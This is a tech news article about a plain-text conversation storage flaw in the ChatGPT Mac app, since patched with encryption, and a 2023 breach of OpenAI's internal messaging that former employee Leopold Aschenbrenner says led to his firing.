This week, OpenAI faced two major security issues that have raised serious concerns about how the company handles cybersecurity:
First issue: ChatGPT Mac app security flaw
Pedro José Pereira Vieito found a serious flaw in the ChatGPT Mac app. He discovered that the app was storing user conversations in plain text on the computer without any encryption. This is a big problem because the app is only available from OpenAI’s website and does not follow Apple’s security requirements. These requirements, known as sandboxing, help keep apps from causing problems for the rest of the system.
The OpenAI ChatGPT app on macOS is not sandboxed and stores all the conversations in **plain-text** in a non-protected location:
~/Library/Application Support/com.openai.chat/conversations-{uuid}/
So basically any other app / malware can read all your ChatGPT conversations: pic.twitter.com/IqtNUOSql7
— Pedro José Pereira Vieito (@pvieito) July 2, 2024
Plain text storage means that anyone with access to the computer could easily read these conversations, making them vulnerable to other apps or malware. After Vieito’s findings were reported by The Verge, OpenAI quickly released an update to encrypt the stored chats.
Second issue: Broader cybersecurity concerns
The second issue dates back to 2023 but came back into the spotlight this week. Last spring, a hacker accessed OpenAI’s internal messaging systems and stole sensitive company information. Leopold Aschenbrenner, a technical program manager at OpenAI, raised alarms about this hack, saying it showed serious security weaknesses that could be exploited by foreign enemies.
Aschenbrenner reported these concerns to OpenAI’s board of directors. He later claimed that he was fired for bringing these issues to light. OpenAI, however, denied this, stating that his departure was not because of his whistleblowing, though they acknowledged his commitment to AI safety.
Implications for OpenAI
Security problems happen to many tech companies, but these incidents are particularly concerning for OpenAI because of how widely ChatGPT is used. These issues raise questions about whether OpenAI can keep its data secure, especially as ChatGPT becomes more integrated into major services.
OpenAI’s response to these problems is crucial for maintaining public trust. Their security practices and transparency are now under scrutiny, and how they handle these concerns will determine their future reputation.
OpenAI is facing significant security challenges. The recent issues with the ChatGPT Mac app and broader cybersecurity vulnerabilities highlight the need for better security measures and clear communication. As OpenAI continues to innovate, addressing these security concerns will be essential for maintaining trust and ensuring safe AI development.
Featured image credit: Eray Eliaçık/Bing